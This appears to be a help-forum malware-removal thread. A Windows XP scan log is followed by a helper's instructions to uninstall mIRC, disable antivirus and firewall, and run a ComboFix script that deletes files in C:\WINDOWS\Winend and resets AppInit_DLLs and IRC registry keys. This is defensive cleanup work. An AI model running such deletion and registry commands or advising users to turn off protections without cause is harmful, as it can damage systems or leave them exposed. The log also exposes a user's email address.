Microsoft Office Excel MUI (French) 2007-->MsiExec.exe /X{90120000-0016-040C-0000-0000000FF1CE}
Microsoft Office InfoPath MUI (French) 2007-->MsiExec.exe /X{90120000-0044-040C-0000-0000000FF1CE}
Microsoft Office Language Pack 2007 Service Pack 1 (SP1)-->msiexec /package {90120000-006E-040C-0000-0000000FF1CE} /uninstall {EC50B538-CBE1-42E6-B7FE-87AA540AADFB}
Microsoft Office Outlook MUI (French) 2007-->MsiExec.exe /X{90120000-001A-040C-0000-0000000FF1CE}
Microsoft Office PowerPoint MUI (French) 2007-->MsiExec.exe /X{90120000-0018-040C-0000-0000000FF1CE}
Microsoft Office Professional Plus 2007-->"C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE12\Office Setup Controller\setup.exe" /uninstall PROPLUS /dll OSETUP.DLL
Microsoft Office Professional Plus 2007-->MsiExec.exe /X{90120000-0011-0000-0000-0000000FF1CE}
Microsoft Office Proof (Arabic) 2007-->MsiExec.exe /X{90120000-001F-0401-0000-0000000FF1CE}
Microsoft Office Proof (Dutch) 2007-->MsiExec.exe /X{90120000-001F-0413-0000-0000000FF1CE}
Microsoft Office Proof (English) 2007-->MsiExec.exe /X{90120000-001F-0409-0000-0000000FF1CE}
Microsoft Office Proof (French) 2007-->MsiExec.exe /X{90120000-001F-040C-0000-0000000FF1CE}
Microsoft Office Proof (German) 2007-->MsiExec.exe /X{90120000-001F-0407-0000-0000000FF1CE}
Microsoft Office Proof (Spanish) 2007-->MsiExec.exe /X{90120000-001F-0C0A-0000-0000000FF1CE}
Microsoft Office Proofing (French) 2007-->MsiExec.exe /X{90120000-002C-040C-0000-0000000FF1CE}
Microsoft Office Publisher MUI (French) 2007-->MsiExec.exe /X{90120000-0019-040C-0000-0000000FF1CE}
Microsoft Office Shared MUI (French) 2007-->MsiExec.exe /X{90120000-006E-040C-0000-0000000FF1CE}
Microsoft Office Word MUI (French) 2007-->MsiExec.exe /X{90120000-001B-040C-0000-0000000FF1CE}
Microsoft SQL Server 2005 Express Edition (SONY_MEDIAMGR2)-->MsiExec.exe /I{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}
Microsoft SQL Server 2005-->"C:\Program Files\Microsoft SQL Server\90\Setup Bootstrap\ARPWrapper.exe" /Remove
Microsoft SQL Server Native Client-->MsiExec.exe /I{F9B3DD02-B0B3-42E9-8650-030DFF0D133D}
Microsoft SQL Server Setup Support Files (English)-->MsiExec.exe /X{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}
Microsoft SQL Server VSS Writer-->MsiExec.exe /I{E9F44C98-B8B6-480F-AF7B-E42A0A46F4E3}
Microsoft User-Mode Driver Framework Feature Pack 1.5-->"C:\WINDOWS\$NtUninstallWudf01005$\spuninst\spuninst.exe"
Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{7299052b-02a4-4627-81f2-1818da5d550d}
Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{A49F249F-0C91-497F-86DF-B2585E8E76B7}
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022-->MsiExec.exe /X{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}
mIRC-->"C:\WINDOWS\Winend\mirc.exe" -uninstall
Mirror's Edge™-->MsiExec.exe /X{AEDBD563-24BB-4EE3-8366-A654DAC2D988}
Mise à jour critique pour Lecteur Windows Media 11 (KB959772)-->"C:\WINDOWS\$NtUninstallKB959772_WM11$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Lecteur Windows Media (KB952069)-->"C:\WINDOWS\$NtUninstallKB952069_WM9$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Lecteur Windows Media 11 (KB936782)-->"C:\WINDOWS\$NtUninstallKB936782_WMP11$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Lecteur Windows Media 11 (KB954154)-->"C:\WINDOWS\$NtUninstallKB954154_WM11$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows Internet Explorer 7 (KB938127-v2)-->"C:\WINDOWS\ie7updates\KB938127-v2-IE7\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows Internet Explorer 7 (KB950759)-->"C:\WINDOWS\ie7updates\KB950759-IE7\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows Internet Explorer 7 (KB953838)-->"C:\WINDOWS\ie7updates\KB953838-IE7\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows Internet Explorer 7 (KB956390)-->"C:\WINDOWS\ie7updates\KB956390-IE7\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows Internet Explorer 7 (KB958215)-->"C:\WINDOWS\ie7updates\KB958215-IE7\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows Internet Explorer 7 (KB960714)-->"C:\WINDOWS\ie7updates\KB960714-IE7\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows Internet Explorer 7 (KB961260)-->"C:\WINDOWS\ie7updates\KB961260-IE7\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB923689)-->"C:\WINDOWS\$NtUninstallKB923689$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB938464)-->"C:\WINDOWS\$NtUninstallKB938464$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB941569)-->"C:\WINDOWS\$NtUninstallKB941569$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB946648)-->"C:\WINDOWS\$NtUninstallKB946648$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB950760)-->"C:\WINDOWS\$NtUninstallKB950760$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB950762)-->"C:\WINDOWS\$NtUninstallKB950762$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB950974)-->"C:\WINDOWS\$NtUninstallKB950974$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB951066)-->"C:\WINDOWS\$NtUninstallKB951066$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB951376-v2)-->"C:\WINDOWS\$NtUninstallKB951376-v2$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB951698)-->"C:\WINDOWS\$NtUninstallKB951698$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB951748)-->"C:\WINDOWS\$NtUninstallKB951748$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB952954)-->"C:\WINDOWS\$NtUninstallKB952954$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB953839)-->"C:\WINDOWS\$NtUninstallKB953839$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB954211)-->"C:\WINDOWS\$NtUninstallKB954211$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB954459)-->"C:\WINDOWS\$NtUninstallKB954459$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB954600)-->"C:\WINDOWS\$NtUninstallKB954600$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB955069)-->"C:\WINDOWS\$NtUninstallKB955069$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB956391)-->"C:\WINDOWS\$NtUninstallKB956391$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB956802)-->"C:\WINDOWS\$NtUninstallKB956802$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB956803)-->"C:\WINDOWS\$NtUninstallKB956803$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB956841)-->"C:\WINDOWS\$NtUninstallKB956841$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB957095)-->"C:\WINDOWS\$NtUninstallKB957095$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB957097)-->"C:\WINDOWS\$NtUninstallKB957097$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB958644)-->"C:\WINDOWS\$NtUninstallKB958644$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB958687)-->"C:\WINDOWS\$NtUninstallKB958687$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB958690)-->"C:\WINDOWS\$NtUninstallKB958690$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB960225)-->"C:\WINDOWS\$NtUninstallKB960225$\spuninst\spuninst.exe"
Mise à jour de sécurité pour Windows XP (KB960715)-->"C:\WINDOWS\$NtUninstallKB960715$\spuninst\spuninst.exe"
Mise à jour pour Windows XP (KB898461)-->"C:\WINDOWS\$NtUninstallKB898461$\spuninst\spuninst.exe"
Mise à jour pour Windows XP (KB942763)-->"C:\WINDOWS\$NtUninstallKB942763$\spuninst\spuninst.exe"
Mise à jour pour Windows XP (KB951072-v2)-->"C:\WINDOWS\$NtUninstallKB951072-v2$\spuninst\spuninst.exe"
Mise à jour pour Windows XP (KB951978)-->"C:\WINDOWS\$NtUninstallKB951978$\spuninst\spuninst.exe"
Mise à jour pour Windows XP (KB955839)-->"C:\WINDOWS\$NtUninstallKB955839$\spuninst\spuninst.exe"
Mise à jour pour Windows XP (KB967715)-->"C:\WINDOWS\$NtUninstallKB967715$\spuninst\spuninst.exe"
Mozilla Firefox (3.0.7)-->C:\Logs\Mozilla Firefox\uninstall\helper.exe
MSVC80_x86-->MsiExec.exe /I{212748BB-0DA5-46DE-82A1-403736DC9F27}
MSVCRT-->MsiExec.exe /I{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}
MSXML 4.0 SP2 (KB936181)-->MsiExec.exe /I{C04E32E0-0416-434D-AFB9-6969D703A9EF}
MSXML 4.0 SP2 (KB954430)-->MsiExec.exe /I{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}
MSXML 6.0 Parser-->MsiExec.exe /I{A43BF6A5-D5F0-4AAA-BF41-65995063EC44}
Mumble and Murmur-->C:\Logs\Mumble2\Uninstall.exe
Nero 7 Essentials-->MsiExec.exe /X{1C00A3F1-6DA0-49F8-94E4-01AB6FC01036}
NewBlue Art Effects-->C:\Logs\Vegas Pro 8.0\Video Plug-Ins\Uninstal.exe
NewBlue Motion Effects-->C:\Logs\Vegas Pro 8.0\Video Plug-Ins\Uninstal.exe
Nokia Connectivity Cable Driver-->MsiExec.exe /X{15AC0C5D-A6FB-4CE2-8CD0-28179EEB5625}
Nokia Flashing Cable Driver-->MsiExec.exe /X{A4E0CA0F-1903-440A-9B98-FEA6CB049999}
Nokia PC Suite-->C:\Documents and Settings\All Users\Application Data\Installations\{58FB2F9A-5F2D-40E8-82DF-4987E60AD8BD}\Nokia_PC_Suite_7_1_18_0_fre.exe
Nokia PC Suite-->MsiExec.exe /I{58FB2F9A-5F2D-40E8-82DF-4987E60AD8BD}
Nokia Software Updater-->MsiExec.exe /X{5D19E730-D3C6-47F4-AE4B-DCB26EC2D905}
NVIDIA Drivers-->C:\WINDOWS\system32\nvuninst.exe UninstallGUI
NVIDIA PhysX v8.10.17-->MsiExec.exe /X{E4D15328-8C89-484B-B9AA-F5BE9EA6D01C}
OpenAL-->"C:\Program Files\OpenAL\oalinst.exe" /U
Outil de téléchargement Windows Live-->MsiExec.exe /I{205C6BDD-7B73-42DE-8505-9A093F35A238}
Package de pilotes Windows - Nokia Modem  (03/05/2008 3.7)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokia_blue_635B28EFCFA9395123BB1C251595CB16129E2560\nokia_bluetooth.inf
Package de pilotes Windows - Nokia Modem  (03/13/2008 6.86.0.1)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokbtmdm_28F2EAC406838DA65AFF6C6886FE9FE96AEF5186\nokbtmdm.inf
Package de pilotes Windows - Nokia Modem  (05/22/2008 3.8)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokia_blue_6F90B0F4A73A2F780A1010B5D6CB5DDFB098181E\nokia_bluetooth.inf
Package de pilotes Windows - Nokia Modem  (05/22/2008 7.00.0.1)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokbtmdm_E68D50F7E25BFE399D47C864C3B52557346242A9\nokbtmdm.inf
Package de pilotes Windows - Nokia Modem  (10/27/2008 3.9)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokia_blue_79486EC6AA0D1732FB17E5167077C07ECAE1B870\nokia_bluetooth.inf
Package de pilotes Windows - Nokia Modem  (10/27/2008 7.01.0.1)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokbtmdm_247189AEBF39EB69A7C75429610DFED2F2EDC1B6\nokbtmdm.inf
Package de pilotes Windows - Nokia pccsmcfd  (08/22/2008 7.0.0.0)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\pccsmcfd_A3B3916E5D8138F59EE218321B27B044D3B18294\pccsmcfd.inf
PC Connectivity Solution-->MsiExec.exe /I{D848D140-41C3-4A53-86D8-E866A100B4CD}
PeerGuardian 2.0-->"C:\Logs\PeerGuardian2\unins000.exe"
Penumbra Black Plague-->"V:\Penumbra\Penumbra Black Plague\unins000.exe"
Penumbra Episode 1-->"V:\Penumbra\Episode 1\unins000.exe"
PoiZone-->C:\Program Files\Image-Line\PoiZone\uninstall.exe
Prince of Persia-->"C:\Program Files\InstallShield Installation Information\{7C11154F-3539-4CB5-979D-EF7913473E53}\setup.exe" -runfromtemp -l0x040c -removeonly
Pro Tools Demo Sessions-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{80961F79-CD86-4416-9684-A0C28F96823E}\Setup.exe" -l0x9 
ProtectDisc Driver, Version 11-->C:\Program Files\ProtectDisc Driver Installer\uninstall_v11.exe
PrtScr 1.0-->"C:\Logs\PrtScr\unins000.exe"
QuickTime Alternative 1.78-->"C:\Logs\QuickTime Alternative\unins000.exe"
QuickTime-->MsiExec.exe /I{216AB108-2AE1-4130-B3D5-20B2C4C80F8F}
Radiance for Vegas Pro 8.0-->MsiExec.exe /I{D0C980B8-012F-4E9A-B090-07038008ACD0}
Real Alternative 1.51 Lite-->"C:\Logs\Real Alternative\unins000.exe"
Reason 3.0-->"P:\Reason\Uninstall Reason\unins000.exe"
Ri4m v5.0.1d-->C:\Logs\Ripp-it_AM\Ri4m_Uninstal.exe
Ripp-It Codec Pack v 4.2.6-->C:\Logs\Ripp-It Codec Pack\uninst.exe
Security Update for 2007 Microsoft Office System (KB951550)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {B243E9A5-ED77-4F1B-B338-2486FD82DC85}
Security Update for 2007 Microsoft Office System (KB951944)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {797AE457-BA17-4BBC-B501-25FB3A0103C7}
Security Update for 2007 Microsoft Office System (KB958439)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {6491B8AA-D11C-4648-A461-6234B31EB7E2}
Security Update for Microsoft Office Excel 2007 (KB958437)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {648FC016-2D6B-4A16-8D87-404533642F4B}
Security Update for Microsoft Office PowerPoint 2007 (KB951338)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {558B709B-821B-4FC5-90FC-9A8890641E77}
Security Update for Microsoft Office Publisher 2007 (KB950114)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {F9C3CDBA-1F00-4D4D-959D-75C9D3ACDD85}
Security Update for Microsoft Office system 2007 (KB954326)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {5F7F6FFF-395D-480E-8450-64F385D82C5F}
Security Update for Microsoft Office system 2007 (KB956828)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {885E081B-72BD-4E76-8E98-30B4BE468FAC}
Security Update for Microsoft Office Word 2007 (KB956358)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {4551666D-0FD6-4C69-8A81-1C6F2E64517C}
Security Update pour Microsoft .NET Framework 2.0 (KB928365)-->C:\WINDOWS\system32\msiexec.exe /promptrestart /uninstall {8056AC9E-49C5-4375-9ADE-B2F862C9DF51} /package {7131646D-CD3C-40F4-97B9-CD9E4E6262EF}
Segoe UI-->MsiExec.exe /I{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}
ShaunWhiteSnowboarding-->"C:\Program Files\InstallShield Installation Information\{2E52FB79-7F60-4AD7-B946-5ED18B4F274E}\Setup.exe" -runfromtemp -l0x040c -removeonly
Skype™ 4.0-->MsiExec.exe /X{24D753CA-6AE9-4E30-8F5F-EFC93E08BF3D}
SONIC ADVENTURE DX-Director's Cut-->V:\Sonic adventure DX\SONICADVENTUREDX\unsetup.exe
Sony Media Manager 2.3-->MsiExec.exe /X{8FA5B6B7-D8BD-49F7-98D7-701C26B01E97}
Sony Vegas Pro 8.0-->MsiExec.exe /X{1246FF64-3035-4A92-8FE6-A968275495EB}
Source SDK Base - Orange Box-->"V:\Steam\steam.exe" steam://uninstall/218
Spybot - Search & Destroy-->"C:\Logs\Spybot - Search & Destroy\unins000.exe"
SuperCopier2-->"C:\Logs\SuperCopier2\SC2Uninst.exe"
TeamSpeak 2 RC2-->C:\Logs\Teamspeak2_RC2\unins000.exe
Toxic Biohazard-->C:\Program Files\Image-Line\Toxic Biohazard\uninstall.exe
Tunatic-->"C:\WINDOWS\lsb_un20.exe" /C=UC /N=Tunatic
Twin USB Vibration Gamepad-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0700\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{BA12FD6D-169A-11D7-A6A9-00C026281E5A}\setup.exe" -l0x9 
Update for Microsoft Office Outlook 2007 (KB952142)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {4AD3A076-427C-491F-A5B7-7D1DE788A756}
Update for Office 2007 (KB946691)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {A420F522-7395-4872-9882-C591B4B92278}
Update for Outlook 2007 Junk Email Filter (kb962871)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {297857BF-4011-449B-BD74-DB64D182821C}
Ventrilo-->MsiExec.exe /I{789289CA-F73A-4A16-A331-54D498CE069F}
VLC media player 0.9.6-->C:\Logs\VLC\uninstall.exe
Winamp Remote-->"C:\Logs\Winamp Remote\uninstall.exe"
Winamp-->"C:\Logs\Winamp\UninstWA.exe"
Windows Communication Foundation-->MsiExec.exe /X{491DD792-AD81-429C-9EB4-86DD3D22E333}
Windows Internet Explorer 7-->"C:\WINDOWS\ie7\spuninst\spuninst.exe"
Windows Live Call-->MsiExec.exe /I{82C7B308-0BDD-49D8-8EA5-9CD3A3F9DF41}
Windows Live Communications Platform-->MsiExec.exe /I{3B4E636E-9D65-4D67-BA61-189800823F52}
Windows Live Messenger-->MsiExec.exe /X{059C042E-796A-4ACC-A81A-ECC2010BB78C}
Windows Media Format 11 runtime-->"C:\Program Files\Windows Media Player\wmsetsdk.exe" /UninstallAll
Windows Media Format 11 runtime-->"C:\WINDOWS\$NtUninstallWMFDist11$\spuninst\spuninst.exe"
Windows Media Player 11-->"C:\WINDOWS\$NtUninstallwmp11$\spuninst\spuninst.exe"
Windows Presentation Foundation-->MsiExec.exe /X{BAF78226-3200-4DB4-BE33-4D922A799840}
Windows Workflow Foundation-->MsiExec.exe /I{7D1B85BD-AA07-48B8-808D-67A4067FC6BD}
Windows XP Service Pack 3-->"C:\WINDOWS\$NtServicePackUninstall$\spuninst\spuninst.exe"
WinDriver Ghost Enterprise 2.05-->C:\Logs\WINDRI~1\UNWISE.EXE C:\Logs\WINDRI~1\INSTALL.LOG
WinPcap 4.0.2-->C:\Program Files\WinPcap\uninstall.exe
x264 Revision 573 x264.nl (remove only)-->"C:\Logs\x264\x264-uninstall.exe"
Xvid 1.1.3 final uninstall-->"C:\Logs\Xvid\unins000.exe"
Zenoté Blur for Vegas-->MsiExec.exe /X{86CC41E6-A4F5-448E-97DC-A9F254193EC7}
Zenoté Glow for Vegas-->MsiExec.exe /X{F3A15FE0-A67B-4E05-853A-46851EAEFBF0}
Zenoté Grain for Vegas-->MsiExec.exe /X{D428F260-DF6E-4D5A-9C8D-5C45CC209FAD}
Zenoté Letterbox for Vegas-->MsiExec.exe /X{8C40E19E-176A-4B42-AD7B-C472AEC6704F}

======Hosts File======

127.0.0.1	www.007guard.com
127.0.0.1	007guard.com
127.0.0.1	008i.com
127.0.0.1	www.008k.com
127.0.0.1	008k.com
127.0.0.1	www.00hq.com
127.0.0.1	00hq.com
127.0.0.1	010402.com
127.0.0.1	www.032439.com
127.0.0.1	032439.com

======Security center information======

AV: AVG Anti-Virus

System event log

Computer Name: LMLMIKE
Event Code: 18
Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
- Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
- Mise à jour de sécurité pour Windows XP (KB954600)
- Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
- Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
- Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)
- Mise à jour de sécurité cumulative pour Internet Explorer 7 pour Windows XP (KB958215)
- Mise à jour de sécurité pour Microsoft Office Excel 2007 (KB958437)
- Mise à jour de sécurité pour Microsoft Office System 2007 (KB958439)

Record Number: 3427
Source Name: Windows Update Agent
Time Written: 20081212050948.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 18
Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
- Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
- Mise à jour de sécurité pour Windows XP (KB954600)
- Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
- Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
- Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)
- Mise à jour de sécurité cumulative pour Internet Explorer 7 pour Windows XP (KB958215)
- Mise à jour de sécurité pour Microsoft Office Excel 2007 (KB958437)

Record Number: 3426
Source Name: Windows Update Agent
Time Written: 20081212050935.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 18
Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
- Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
- Mise à jour de sécurité pour Windows XP (KB954600)
- Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
- Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
- Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)
- Mise à jour de sécurité cumulative pour Internet Explorer 7 pour Windows XP (KB958215)

Record Number: 3425
Source Name: Windows Update Agent
Time Written: 20081212050923.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 18
Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
- Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
- Mise à jour de sécurité pour Windows XP (KB954600)
- Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
- Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
- Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)

Record Number: 3424
Source Name: Windows Update Agent
Time Written: 20081212050858.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 18
Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
- Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
- Mise à jour de sécurité pour Windows XP (KB954600)
- Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
- Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)

Record Number: 3423
Source Name: Windows Update Agent
Time Written: 20081212050844.000000+060
Event Type: Informations
User: 

Application event log

Computer Name: LMLMIKE
Event Code: 700
Message: msnmsgr (468) La défragmentation en ligne commence un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.

Record Number: 14694
Source Name: ESENT
Time Written: 20090117090012.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 701
Message: msnmsgr (468) La défragmentation en ligne a terminé un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.

Record Number: 14693
Source Name: ESENT
Time Written: 20090117080012.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 700
Message: msnmsgr (468) La défragmentation en ligne commence un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.

Record Number: 14692
Source Name: ESENT
Time Written: 20090117080012.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 701
Message: msnmsgr (468) La défragmentation en ligne a terminé un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.

Record Number: 14691
Source Name: ESENT
Time Written: 20090117070012.000000+060
Event Type: Informations
User: 

Computer Name: LMLMIKE
Event Code: 700
Message: msnmsgr (468) La défragmentation en ligne commence un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.

Record Number: 14690
Source Name: ESENT
Time Written: 20090117070012.000000+060
Event Type: Informations
User: 

======Environment variables======

"ComSpec"=%SystemRoot%\system32\cmd.exe
"Path"=C:\Program Files\PC Connectivity Solution\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Microsoft SQL Server\90\Tools\binn\;C:\Logs\Diskeeper\;C:\Program Files\Fichiers communs\Autodesk Shared\;V:\Logs\backburner\;C:\Program Files\Fichiers communs\Adobe\AGL;C:\Logs\QuickTime Alternative\QTSystem\;C:\Program Files\Fichiers communs\GIS\Tools
"windir"=%SystemRoot%
"FP_NO_HOST_CHECK"=NO
"OS"=Windows_NT
"PROCESSOR_ARCHITECTURE"=x86
"PROCESSOR_LEVEL"=6
"PROCESSOR_IDENTIFIER"=x86 Family 6 Model 15 Stepping 6, GenuineIntel
"PROCESSOR_REVISION"=0f06
"NUMBER_OF_PROCESSORS"=2
"PATHEXT"=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
"TEMP"=%SystemRoot%\TEMP
"TMP"=%SystemRoot%\TEMP
"sourcesdk"=v:\steam\steamapps\lml_mike@hotmail.com\sourcesdk
"VProject"=v:\steam\steamapps\lml_mike@hotmail.com\half-life 2 episode two\ep2
"CLASSPATH"=.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip
"QTJAVA"=C:\Program Files\Java\jre6\lib\ext\QTJava.zip

-----------------EOF-----------------
0
Lyonnais92 Posts: 25708 Status: Security contributor 1 537

Re,

Disconnect from the Internet.

Uninstall mIRC via the Control Panel.

===============
Copy or print these instructions beforehand

Disconnect from the Internet and close all your applications.

Disable your protections (antivirus, firewall, real-time guard of the antispyware)

Create a new text document: right-click on the desktop > New > Text Document, and copy the following lines into it:
KillAll::

File::
c:\windows\NAVIGMA.INI
c:\windows\system32\antbve.dll
c:\windows\Winend\scan.dll
c:\windows\Winend\script.dll
c:\windows\Winend\serv.dll

folder::
c:\windows\Winend

Registry::
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=""
[HKEY_CURRENT_USER\Software\Classes\irc\Shell\open\command]
@=""
[HKEY_CURRENT_USER\Software\Classes\irc\DefaultIcon]
@=""

[-HKEY_CURRENT_USER\Software\Classes\.cha]
[-HKEY_CURRENT_USER\Software\Classes\.chat]
[-HKEY_CURRENT_USER\Software\Classes\ChatFile]
[HKEY_CURRENT_USER\Software\Classes\irc\Shell\open\ddeexec]

Save this file under the name CFscript

Drag and drop this CFscript file onto the ComboFix.exe file

Click on the CFscript file, keep the mouse button held down and drag so that the CFscript icon comes to cover the ComboFix icon. Release the mouse. ComboFix will start.

Wait while the scan runs. The desktop will disappear several times: this is normal!

Don't touch anything until the scan is finished.

Re-enable your firewall, your antivirus and your antispyware guard

Once the scan is complete, a report will be displayed: post its contents.

Also post a new HijackThis report

